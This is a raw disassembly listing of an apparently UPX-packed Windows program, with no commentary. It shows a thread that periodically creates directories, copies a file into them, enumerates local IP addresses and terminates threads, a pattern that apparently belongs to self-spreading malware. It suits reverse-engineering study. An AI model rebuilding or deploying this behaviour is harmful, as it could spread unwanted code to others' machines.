and ecx, 3
cmp al, bl
rep movsb
jz short loc_4093A9
lea eax, [esp+514h+var_4A0]
lea edx, [eax+1]
loc_409358: ; CODE XREF: sub_4091D0+18D�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_409358
push 14h
sub eax, edx
lea ecx, [esp+518h+var_4C8]
push ecx
inc eax
push eax
lea edx, [esp+520h+var_4A0]
push edx
push ebx
push ebx
call dword_4240FC ; MultiByteToWideChar
loc_40937A: ; CODE XREF: sub_4091D0+4BF�j
mov esi, [esp+514h+var_4F4]
mov edi, edi
loc_409380: ; CODE XREF: sub_4091D0+1F4�j
cmp byte ptr [esp+514h+var_504+3], bl
jz short loc_4093C6
lea eax, [esp+514h+var_4CC]
push eax
lea ecx, [esp+518h+var_4EC]
push ecx
lea edx, [esp+51Ch+var_4F0]
push edx
push 0FFFFFFFFh
lea eax, [esp+524h+var_4E0]
push eax
push 1
lea ecx, [esp+52Ch+var_4C8]
push ecx
call [esp+530h+var_4DC]
jmp short loc_4093FE
; ---------------------------------------------------------------------------
loc_4093A9: ; CODE XREF: sub_4091D0+17F�j
push 190h
mov [esp+518h+var_4E4], 190h
call sub_419DCB
mov esi, eax
add esp, 4
mov [esp+514h+var_4F4], esi
jmp short loc_409380
; ---------------------------------------------------------------------------
loc_4093C6: ; CODE XREF: sub_4091D0+1B4�j
mov ecx, [esp+514h+var_4E4]
lea edx, [esp+514h+var_4FC]
push edx
lea eax, [esp+518h+var_4D4]
push eax
push ecx
push esi
push 1
lea edx, [esp+528h+var_4A0]
push edx
mov [esp+52Ch+var_4D4], ebx
mov [esp+52Ch+var_4FC], ebx
call dword ptr [esp+52Ch+var_4D0]
movzx ecx, word ptr [esp+514h+var_4D4]
movzx edx, word ptr [esp+514h+var_4FC]
mov [esp+514h+var_4F0], ecx
mov [esp+514h+var_4EC], edx
loc_4093FE: ; CODE XREF: sub_4091D0+1D7�j
cmp eax, ebx
mov dword ptr [esp+514h+var_4E8], eax
jz short loc_409411
cmp eax, 0EAh
jnz loc_409695
loc_409411: ; CODE XREF: sub_4091D0+234�j
cmp byte ptr [esp+514h+var_504+3], bl
jz short loc_409421
mov eax, [esp+514h+var_4E0]
mov [esp+514h+var_4F8], eax
jmp short loc_409425
; ---------------------------------------------------------------------------
loc_409421: ; CODE XREF: sub_4091D0+245�j
mov [esp+514h+var_500], esi
loc_409425: ; CODE XREF: sub_4091D0+24F�j
cmp [esp+514h+var_4F0], 1
mov [esp+514h+var_4FC], 1
jb loc_409669
mov edx, [esp+514h+var_500]
mov esi, [esp+514h+var_4F8]
lea ebp, [esp+514h+var_208]
sub ebp, edx
jmp short loc_409450
; ---------------------------------------------------------------------------
loc_40944B: ; CODE XREF: sub_4091D0+493�j
mov edx, [esp+514h+var_500]
nop
loc_409450: ; CODE XREF: sub_4091D0+279�j
cmp byte ptr [esp+514h+var_504+3], bl
jz loc_409568
mov edx, [esi]
mov edi, dword_42410C
push ebx
push ebx
push 100h
lea ecx, [esp+520h+var_308]
push ecx
push 0FFFFFFFFh
push edx
push ebx
push ebx
call edi ; WideCharToMultiByte
mov ecx, [esi+8]
push ebx
push ebx
push 100h
lea eax, [esp+520h+var_104]
push eax
push 0FFFFFFFFh
push ecx
push ebx
push ebx
call edi ; WideCharToMultiByte
cmp [esi+4], ebx
jnz loc_40955C
push 104h
call sub_4191BC
lea ecx, [esp+518h+var_4A0]
mov esi, eax
mov edx, ecx
add esp, 4
sub esi, edx
loc_4094B1: ; CODE XREF: sub_4091D0+2E9�j
mov dl, [ecx]
mov [esi+ecx], dl
inc ecx
cmp dl, bl
jnz short loc_4094B1
mov edi, eax
dec edi
mov edi, edi
loc_4094C0: ; CODE XREF: sub_4091D0+2F6�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_4094C0
mov cx, word_4243BC
mov [edi], cx
lea ecx, [esp+514h+var_308]
mov esi, ecx
jmp short loc_4094E0
; ---------------------------------------------------------------------------
align 10h
loc_4094E0: ; CODE XREF: sub_4091D0+30B�j
; sub_4091D0+315�j
mov dl, [ecx]
inc ecx
cmp dl, bl
jnz short loc_4094E0
sub ecx, esi
mov edi, eax
mov edx, ecx
dec edi
mov edi, edi
loc_4094F0: ; CODE XREF: sub_4091D0+326�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_4094F0
mov ecx, edx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, eax
lea esi, [ecx+1]
jmp short loc_409510
; ---------------------------------------------------------------------------
align 10h
loc_409510: ; CODE XREF: sub_4091D0+33B�j
; sub_4091D0+345�j
mov dl, [ecx]
inc ecx
cmp dl, bl
jnz short loc_409510
sub ecx, esi
cmp byte ptr [ecx+eax-1], 5Ch
jz short loc_40954A
mov ecx, eax
lea esi, [ecx+1]
loc_409525: ; CODE XREF: sub_4091D0+35A�j
mov dl, [ecx]
inc ecx
cmp dl, bl
jnz short loc_409525
sub ecx, esi
cmp byte ptr [ecx+eax-1], 2Fh
jz short loc_40954A
mov edi, eax
dec edi
loc_409538: ; CODE XREF: sub_4091D0+36E�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_409538
mov dx, word_4243BC
mov [edi], dx
loc_40954A: ; CODE XREF: sub_4091D0+34E�j
; sub_4091D0+363�j
mov ecx, [esp+514h+arg_4]
push ebx
push eax
call sub_410740
mov esi, [esp+514h+var_4F8]
loc_40955C: ; CODE XREF: sub_4091D0+2C4�j
add esi, 0Ch
mov [esp+514h+var_4F8], esi
jmp loc_409654
; ---------------------------------------------------------------------------
loc_409568: ; CODE XREF: sub_4091D0+284�j
mov eax, edx
lea ebx, [ebx+0]
loc_409570: ; CODE XREF: sub_4091D0+3A8�j
mov cl, [eax]
mov [eax+ebp], cl
inc eax
cmp cl, bl
jnz short loc_409570
cmp [edx+0Eh], bx
jnz loc_40964C
push 104h
call sub_4191BC
lea ecx, [esp+518h+var_4A0]
mov esi, eax
mov edx, ecx
add esp, 4
sub esi, edx
jmp short loc_4095A0
; ---------------------------------------------------------------------------
align 10h
loc_4095A0: ; CODE XREF: sub_4091D0+3CB�j
; sub_4091D0+3D8�j
mov dl, [ecx]
mov [esi+ecx], dl
inc ecx
cmp dl, bl
jnz short loc_4095A0
mov edi, eax
dec edi
lea ecx, [ecx+0]
loc_4095B0: ; CODE XREF: sub_4091D0+3E6�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_4095B0
mov cx, word_4243BC
mov [edi], cx
lea ecx, [esp+514h+var_208]
mov esi, ecx
jmp short loc_4095D0
; ---------------------------------------------------------------------------
align 10h
loc_4095D0: ; CODE XREF: sub_4091D0+3FB�j
; sub_4091D0+405�j
mov dl, [ecx]
inc ecx
cmp dl, bl
jnz short loc_4095D0
sub ecx, esi
mov edi, eax
mov edx, ecx
dec edi
mov edi, edi
loc_4095E0: ; CODE XREF: sub_4091D0+416�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_4095E0
mov ecx, edx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, eax
lea esi, [ecx+1]
jmp short loc_409600
; ---------------------------------------------------------------------------
align 10h
loc_409600: ; CODE XREF: sub_4091D0+42B�j
; sub_4091D0+435�j
mov dl, [ecx]
inc ecx
cmp dl, bl
jnz short loc_409600
sub ecx, esi
cmp byte ptr [ecx+eax-1], 5Ch
jz short loc_40963A
mov ecx, eax
lea esi, [ecx+1]
loc_409615: ; CODE XREF: sub_4091D0+44A�j
mov dl, [ecx]
inc ecx
cmp dl, bl
jnz short loc_409615
sub ecx, esi
cmp byte ptr [ecx+eax-1], 2Fh
jz short loc_40963A
mov edi, eax
dec edi
loc_409628: ; CODE XREF: sub_4091D0+45E�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_409628
mov dx, word_4243BC
mov [edi], dx
loc_40963A: ; CODE XREF: sub_4091D0+43E�j
; sub_4091D0+453�j
mov ecx, [esp+514h+arg_4]
push ebx
push eax
call sub_410740
mov esi, [esp+514h+var_4F8]
loc_40964C: ; CODE XREF: sub_4091D0+3AE�j
add [esp+514h+var_500], 14h
sub ebp, 14h
loc_409654: ; CODE XREF: sub_4091D0+393�j
mov eax, [esp+514h+var_4FC]
mov ecx, [esp+514h+var_4F0]
inc eax
cmp eax, ecx
mov [esp+514h+var_4FC], eax
jbe loc_40944B
loc_409669: ; CODE XREF: sub_4091D0+262�j
cmp byte ptr [esp+514h+var_504+3], bl
jz short loc_40967A
mov eax, [esp+514h+var_4E0]
push eax
call [esp+518h+var_4D8]
jmp short loc_409687
; ---------------------------------------------------------------------------
loc_40967A: ; CODE XREF: sub_4091D0+49D�j
mov ecx, [esp+514h+var_4F4]
push ecx
call sub_419DDD
add esp, 4
loc_409687: ; CODE XREF: sub_4091D0+4A8�j
cmp dword ptr [esp+514h+var_4E8], 0EAh
jz loc_40937A
loc_409695: ; CODE XREF: sub_4091D0+23B�j
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
mov ecx, [esp+504h+var_4]
call sub_4192B6
add esp, 504h
retn
; ---------------------------------------------------------------------------
loc_4096B1: ; CODE XREF: sub_4091D0+1F�j
; sub_4091D0+2C�j
mov ecx, [esp+50Ch+var_4]
pop ebp
xor eax, eax
pop ebx
call sub_4192B6
add esp, 504h
retn
sub_4091D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4096D0 proc near ; CODE XREF: sub_409BA0+6E�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
call sub_418F60
mov eax, [esp+4+arg_0]
mov [esi+24h], eax
xor eax, eax
mov [esi+18h], eax
mov [esi+1Ch], eax
mov [esi+20h], eax
mov dword ptr [esi], offset off_4244A0
mov eax, esi
pop esi
retn 4
sub_4096D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409700 proc near ; CODE XREF: UPX0:00409A23�p
mov dword ptr [ecx], offset off_4244A0
jmp sub_418F90
sub_409700 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409710 proc near ; DATA XREF: UPX0:004244A4�o
var_460 = byte ptr -460h
var_35C = byte ptr -35Ch
var_258 = byte ptr -258h
var_218 = byte ptr -218h
var_1D8 = byte ptr -1D8h
var_198 = byte ptr -198h
var_159 = byte ptr -159h
var_158 = byte ptr -158h
var_54 = byte ptr -54h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_409710
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 454h
mov eax, dword_42A290
push ebx
mov ebx, ecx
mov [ebp+var_14], eax
mov eax, [ebx+1Ch]
test eax, eax
push esi
push edi
mov [ebp+var_10], esp
jz loc_4099E5
push 0FFFFFFFEh
mov [ebp+var_4], 0
call dword_4240A4 ; GetCurrentThread
push eax
call dword_4240A0 ; SetThreadPriority
push 0
call sub_419875
push eax
call sub_419846
add esp, 8
nop
loc_409770: ; CODE XREF: sub_409710+2CA�j
mov eax, [ebx+18h]
test eax, eax
jnz loc_4099E5
lea eax, [ebp+var_158]
push eax
push 104h
call dword_4240B4 ; GetCurrentDirectoryA
lea eax, [ebp+var_158]
lea edx, [eax+1]
loc_409796: ; CODE XREF: sub_409710+8B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_409796
sub eax, edx
cmp [ebp+eax+var_159], 5Ch
jz short loc_4097E2
lea eax, [ebp+var_158]
lea edx, [eax+1]
loc_4097B2: ; CODE XREF: sub_409710+A7�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4097B2
sub eax, edx
cmp [ebp+eax+var_159], 2Fh
jz short loc_4097E2
lea edi, [ebp+var_158]
dec edi
lea esp, [esp+0]
loc_4097D0: ; CODE XREF: sub_409710+C6�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_4097D0
mov cx, word_4243BC
mov [edi], cx
loc_4097E2: ; CODE XREF: sub_409710+97�j
; sub_409710+B3�j
lea edx, [ebp+var_54]
push edx
call sub_40EB90
lea eax, [ebp+var_54]
add esp, 4
mov esi, eax
loc_4097F3: ; CODE XREF: sub_409710+E8�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4097F3
lea edi, [ebp+var_158]
sub eax, esi
dec edi
loc_409803: ; CODE XREF: sub_409710+F9�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_409803
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
push 0
lea eax, [ebp+var_158]
and ecx, 3
push eax
rep movsb
call dword_424114 ; CreateDirectoryA
lea ecx, [ebp+var_158]
lea edx, [ebp+var_35C]
loc_409834: ; CODE XREF: sub_409710+12C�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_409834
lea ecx, [ebp+var_158]
lea edx, [ebp+var_460]
lea ebx, [ebx+0]
loc_409850: ; CODE XREF: sub_409710+148�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
test al, al
jnz short loc_409850
lea edi, [ebp+var_35C]
dec edi
loc_409861: ; CODE XREF: sub_409710+157�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_409861
mov cx, word_4243BC
mov [edi], cx
lea edi, [ebp+var_460]
dec edi
lea ebx, [ebx+0]
loc_409880: ; CODE XREF: sub_409710+176�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_409880
mov [edi], cx
lea ecx, [ebp+var_218]
push ecx
call sub_40E760
lea edx, [ebp+var_1D8]
add esp, 4
push edx
call sub_40EB20
lea eax, [ebp+var_198]
add esp, 4
push eax
call sub_40E8B0
lea ecx, [ebp+var_258]
add esp, 4
push ecx
call sub_40EAE0
lea eax, [ebp+var_218]
add esp, 4
mov edx, eax
nop
loc_4098D0: ; CODE XREF: sub_409710+1C5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4098D0
lea edi, [ebp+var_35C]
sub eax, edx
dec edi
loc_4098E0: ; CODE XREF: sub_409710+1D6�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4098E0
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp+var_1D8]
rep movsb
mov ecx, eax
loc_409900: ; CODE XREF: sub_409710+1F5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_409900
lea edi, [ebp+var_35C]
sub eax, ecx
mov esi, ecx
dec edi
loc_409912: ; CODE XREF: sub_409710+208�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_409912
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp+var_198]
rep movsb
mov ecx, eax
loc_409930: ; CODE XREF: sub_409710+225�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_409930
lea edi, [ebp+var_460]
sub eax, ecx
mov esi, ecx
dec edi
loc_409942: ; CODE XREF: sub_409710+238�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_409942
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp+var_258]
rep movsb
mov ecx, eax
loc_409960: ; CODE XREF: sub_409710+255�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_409960
lea edi, [ebp+var_460]
sub eax, ecx
mov esi, ecx
dec edi
loc_409972: ; CODE XREF: sub_409710+268�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_409972
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebx+20h]
and ecx, 3
rep movsb
mov ecx, [eax]
push 0
lea edx, [ebp+var_35C]
push edx
add ecx, 108h
push ecx
call dword_424110 ; CopyFileA
mov eax, [ebx+20h]
mov ecx, [eax+4]
lea edx, [ebp+var_460]
push edx
call sub_40B0E0
lea ecx, [ebp+var_158]
push ecx
lea edx, [ebp+var_54]
push edx
call sub_408FC0
mov eax, [ebx+18h]
add esp, 8
test eax, eax
jnz short loc_4099E5
push 2BF20h
call dword_42408C ; Sleep
jmp loc_409770
; ---------------------------------------------------------------------------
loc_4099DF: ; DATA XREF: UPX0:00426650�o
mov eax, offset loc_4099E5
retn
; ---------------------------------------------------------------------------
loc_4099E5: ; CODE XREF: sub_409710+33�j
; sub_409710+65�j ...
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov ecx, [ebp+var_14]
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_409710 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409A00 proc near ; CODE XREF: sub_409A40+15�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov [ecx+20h], eax
mov dword ptr [ecx+1Ch], 1
retn 4
sub_409A00 endp
; ---------------------------------------------------------------------------
align 10h
loc_409A20: ; DATA XREF: UPX0:off_4244A0�o
push esi
mov esi, ecx
call sub_409700
test byte ptr [esp+8], 1
jz short loc_409A38
push esi
call sub_41930D
add esp, 4
loc_409A38: ; CODE XREF: UPX0:00409A2D�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409A40 proc near ; CODE XREF: sub_40C950+126�p
push esi
mov esi, ecx
mov eax, [esi+8]
test eax, eax
jnz short loc_409A4E
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_409A4E: ; CODE XREF: sub_409A40+8�j
mov eax, [esi+0Ch]
mov ecx, [esi+4]
push eax
call sub_409A00
mov ecx, [esi+4]
push 1
call sub_419070
mov eax, 1
pop esi
retn
sub_409A40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409A70 proc near ; CODE XREF: sub_40C7C0+D3�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov [ecx+0Ch], eax
mov dword ptr [ecx+8], 1
retn 4
sub_409A70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409A90 proc near ; CODE XREF: sub_40C950+1F2�p
mov eax, [ecx+4]
mov dword ptr [eax+18h], 1
mov eax, [ecx]
mov eax, [eax+0Ch]
test eax, eax
push ebp
push esi
jnz short loc_409AA9
xor ebp, ebp
jmp short loc_409ABA
; ---------------------------------------------------------------------------
loc_409AA9: ; CODE XREF: sub_409A90+13�j
xor edx, edx
jmp short loc_409AB0
; ---------------------------------------------------------------------------
align 10h
loc_409AB0: ; CODE XREF: sub_409A90+1B�j
; sub_409A90+26�j
mov eax, [eax+4]
inc edx
test eax, eax
jnz short loc_409AB0
mov ebp, edx
loc_409ABA: ; CODE XREF: sub_409A90+17�j
xor esi, esi
test ebp, ebp
jle short loc_409AF6
push ebx
push edi
loc_409AC2: ; CODE XREF: sub_409A90+62�j
mov edi, [ecx]
mov eax, [edi+0Ch]
test eax, eax
jz short loc_409AEF
mov edx, 1
cmp esi, edx
jl short loc_409AE3
mov ebx, [edi+10h]
loc_409AD7: ; CODE XREF: sub_409A90+51�j
cmp eax, ebx
jz short loc_409AEF
mov eax, [eax+4]
inc edx
cmp edx, esi
jle short loc_409AD7
loc_409AE3: ; CODE XREF: sub_409A90+42�j
mov [edi+18h], eax
mov eax, [eax]
mov dword ptr [eax+18h], 1
loc_409AEF: ; CODE XREF: sub_409A90+39�j
; sub_409A90+49�j
inc esi
cmp esi, ebp
jl short loc_409AC2
pop edi
pop ebx
loc_409AF6: ; CODE XREF: sub_409A90+2E�j
pop esi
pop ebp
retn
sub_409A90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409B00 proc near ; CODE XREF: sub_40C950+1FA�p
var_4 = dword ptr -4
push ecx
push ebx
mov ebx, ecx
mov eax, [ebx]
mov eax, [eax+0Ch]
push ebp
push edi
xor edi, edi
cmp eax, edi
jnz short loc_409B17
mov [esp+10h+var_4], edi
jmp short loc_409B2C
; ---------------------------------------------------------------------------
loc_409B17: ; CODE XREF: sub_409B00+F�j
xor ecx, ecx
lea esp, [esp+0]
loc_409B20: ; CODE XREF: sub_409B00+26�j
mov eax, [eax+4]
inc ecx
cmp eax, edi
jnz short loc_409B20
mov [esp+10h+var_4], ecx
loc_409B2C: ; CODE XREF: sub_409B00+15�j
mov ecx, [ebx+4]
push 493E0h
call sub_419020
mov eax, [ebx+4]
mov ecx, [eax+8]
mov ebp, dword_424068
push edi
push ecx
call ebp ; TerminateThread
cmp [esp+10h+var_4], edi
jle short loc_409B94
push esi
loc_409B50: ; CODE XREF: sub_409B00+91�j
mov edx, [ebx]
mov eax, [edx+0Ch]
test eax, eax
jz short loc_409B8A
mov ecx, 1
cmp edi, ecx
jl short loc_409B71
mov esi, [edx+10h]
loc_409B65: ; CODE XREF: sub_409B00+6F�j
cmp eax, esi
jz short loc_409B8A
mov eax, [eax+4]
inc ecx
cmp ecx, edi
jle short loc_409B65
loc_409B71: ; CODE XREF: sub_409B00+60�j
mov [edx+18h], eax
mov esi, [eax]
push 493E0h
mov ecx, esi
call sub_419020
mov edx, [esi+8]
push 0
push edx
call ebp ; TerminateThread
loc_409B8A: ; CODE XREF: sub_409B00+57�j
; sub_409B00+67�j
mov eax, [esp+14h+var_4]
inc edi
cmp edi, eax
jl short loc_409B50
pop esi
loc_409B94: ; CODE XREF: sub_409B00+4D�j
pop edi
pop ebp
pop ebx
pop ecx
retn
sub_409B00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409BA0 proc near ; CODE XREF: sub_40C480+1F6�p
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
mov eax, large fs:0
push 0FFFFFFFFh
push offset SEH_409BA0
push eax
mov eax, [esp+0Ch+arg_0]
mov large fs:0, esp
push esi
mov esi, ecx
push edi
xor edi, edi
push 1Ch
mov [esi+10h], eax
mov [esi+8], edi
mov [esi+0Ch], edi
call sub_4191C1
add esp, 4
cmp eax, edi
jz short loc_409BEE
mov [eax+4], edi
mov [eax+8], edi
mov [eax+0Ch], edi
mov [eax+10h], edi
mov [eax+18h], edi
mov dword ptr [eax+14h], 1
jmp short loc_409BF0
; ---------------------------------------------------------------------------
loc_409BEE: ; CODE XREF: sub_409BA0+34�j
xor eax, eax
loc_409BF0: ; CODE XREF: sub_409BA0+4C�j
push 28h
mov [esi], eax
call sub_4191C1
add esp, 4
mov [esp+14h+arg_0], eax
cmp eax, edi
mov [esp+14h+var_4], edi
jz short loc_409C2B
mov ecx, [esi+10h]
push ecx
mov ecx, eax
call sub_4096D0
mov [esi+4], eax
mov eax, esi
mov ecx, [esp+14h+var_C]
mov large fs:0, ecx
pop edi
pop esi
add esp, 0Ch
retn 4
; ---------------------------------------------------------------------------
loc_409C2B: ; CODE XREF: sub_409BA0+66�j
mov ecx, [esp+14h+var_C]
mov [esi+4], edi
pop edi
mov eax, esi
mov large fs:0, ecx
pop esi
add esp, 0Ch
retn 4
sub_409BA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409C50 proc near ; CODE XREF: sub_40C950+12E�p
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_114 = dword ptr -114h
var_110 = byte ptr -110h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push 0FFFFFFFFh
push offset SEH_409C50
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 110h
mov eax, dword_42A290
push ebp
mov ebp, ecx
mov [esp+120h+var_10], eax
mov eax, [ebp+8]
test eax, eax
jz short loc_409CA8
push 100h
lea eax, [esp+124h+var_110]
push eax
call dword_424278 ; gethostname
test eax, eax
jnz short loc_409CA8
lea ecx, [esp+120h+var_110]
push ecx
call dword_42427C ; gethostbyname
test eax, eax
mov [esp+120h+var_11C], eax
jnz short loc_409CAF
loc_409CA8: ; CODE XREF: sub_409C50+2F�j
; sub_409C50+43�j
xor eax, eax
jmp loc_409D52
; ---------------------------------------------------------------------------
loc_409CAF: ; CODE XREF: sub_409C50+56�j
mov eax, [eax+0Ch]
mov ecx, [eax]
push ebx
xor ebx, ebx
test ecx, ecx
jz loc_409D4F
push esi
push edi
loc_409CC1: ; CODE XREF: sub_409C50+F7�j
mov eax, [eax+ebx*4]
mov edi, offset byte_4243C3
mov esi, eax
mov ecx, 1
xor edx, edx
repe cmpsb
jz short loc_409D4D
mov eax, [eax]
push 2Ch
mov dword ptr [esp+130h+var_118], eax
call sub_4191C1
add esp, 4
mov [esp+12Ch+var_114], eax
test eax, eax
mov [esp+12Ch+var_4], 0
jz short loc_409D08
mov ecx, [ebp+10h]
push ecx
mov ecx, eax
call sub_409DB0
mov esi, eax
jmp short loc_409D0A
; ---------------------------------------------------------------------------
loc_409D08: ; CODE XREF: sub_409C50+A7�j
xor esi, esi
loc_409D0A: ; CODE XREF: sub_409C50+B6�j
mov eax, [ebp+0Ch]
lea edx, [esp+12Ch+var_118]
push edx
push eax
mov ecx, esi
mov [esp+134h+var_4], 0FFFFFFFFh
call sub_409DF0
push 1
mov ecx, esi
call sub_419070
mov ecx, [ebp+0]
push 0
push esi
call sub_410740
mov ecx, [esp+12Ch+var_11C]
mov eax, [ecx+0Ch]
mov ecx, [eax+ebx*4+4]
inc ebx
test ecx, ecx
jnz loc_409CC1
loc_409D4D: ; CODE XREF: sub_409C50+84�j
pop edi
pop esi
loc_409D4F: ; CODE XREF: sub_409C50+69�j
mov eax, ebx
pop ebx
loc_409D52: ; CODE XREF: sub_409C50+5A�j
mov ecx, [esp+120h+var_C]
mov large fs:0, ecx
mov ecx, [esp+120h+var_10]
pop ebp
call sub_4192B6
add esp, 11Ch
retn
sub_409C50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409D80 proc near ; CODE XREF: sub_40CBE0+88�p
push esi
mov esi, ecx
push edi
mov edi, [esi]
test edi, edi
jz short loc_409D9A
mov ecx, edi
call sub_408720
push edi
call sub_41930D
add esp, 4
loc_409D9A: ; CODE XREF: sub_409D80+8�j
mov ecx, [esi+4]
test ecx, ecx
pop edi
pop esi
jz short locret_409DA9
mov eax, [ecx]
push 1
call dword ptr [eax]
locret_409DA9: ; CODE XREF: sub_409D80+21�j
retn
sub_409D80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409DB0 proc near ; CODE XREF: sub_409C50+AF�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
call sub_418F60
mov eax, [esp+4+arg_0]
mov [esi+28h], eax
xor eax, eax
mov [esi+18h], eax
mov [esi+1Ch], eax
mov [esi+24h], eax
mov dword ptr [esi], offset off_4244A8
mov [esi+20h], eax
mov eax, esi
pop esi
retn 4
sub_409DB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409DE0 proc near ; CODE XREF: UPX0:00409E13�p
mov dword ptr [ecx], offset off_4244A8
jmp sub_418F90
sub_409DE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409DF0 proc near ; CODE XREF: sub_409C50+D0�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov edx, [esp+arg_4]
mov [ecx+24h], eax
mov eax, [edx]
mov [ecx+20h], eax
mov dword ptr [ecx+1Ch], 1
retn 8
sub_409DF0 endp
; ---------------------------------------------------------------------------
align 10h
loc_409E10: ; DATA XREF: UPX0:off_4244A8�o
push esi
mov esi, ecx
call sub_409DE0
test byte ptr [esp+8], 1
jz short loc_409E28
push esi
call sub_41930D
add esp, 4
loc_409E28: ; CODE XREF: UPX0:00409E1D�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409E30 proc near ; DATA XREF: UPX0:004244AC�o
var_348 = byte ptr -348h
var_344 = dword ptr -344h
var_340 = dword ptr -340h
var_33C = dword ptr -33Ch
var_338 = dword ptr -338h
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_31D = byte ptr -31Dh
var_31C = byte ptr -31Ch
var_218 = byte ptr -218h
var_114 = byte ptr -114h
var_D4 = byte ptr -0D4h
var_94 = byte ptr -94h
var_54 = byte ptr -54h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_409E30
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 33Ch
mov eax, dword_42A290
push ebx
push esi
mov esi, ecx
mov [ebp+var_14], eax
mov eax, [esi+1Ch]
xor ebx, ebx
cmp eax, ebx
push edi
mov [ebp+var_10], esp
mov [ebp+var_328], esi
jz loc_40A1C0
mov [ebp+var_344], ebx
mov [ebp+var_340], ebx
mov [ebp+var_33C], ebx
mov [ebp+var_338], ebx
mov [ebp+var_330], ebx
mov [ebp+var_334], 1
mov [ebp+var_4], ebx
push 0FFFFFFFEh
mov byte ptr [ebp+var_4], 1
call dword_4240A4 ; GetCurrentThread
push eax
call dword_4240A0 ; SetThreadPriority
push ebx
call sub_419875
push eax
call sub_419846
add esp, 8
mov edi, edi
loc_409EC0: ; CODE XREF: sub_409E30+373�j
cmp [esi+18h], ebx
jnz loc_40A1B0
xor al, al
loc_409ECB: ; CODE XREF: sub_409E30+34F�j
or cl, 0FFh
cmp al, cl
mov [ebp+var_31D], al
ja loc_40A193
cmp [esi+18h], ebx
jnz loc_40A193
cmp [esi+23h], al
jz loc_40A17D
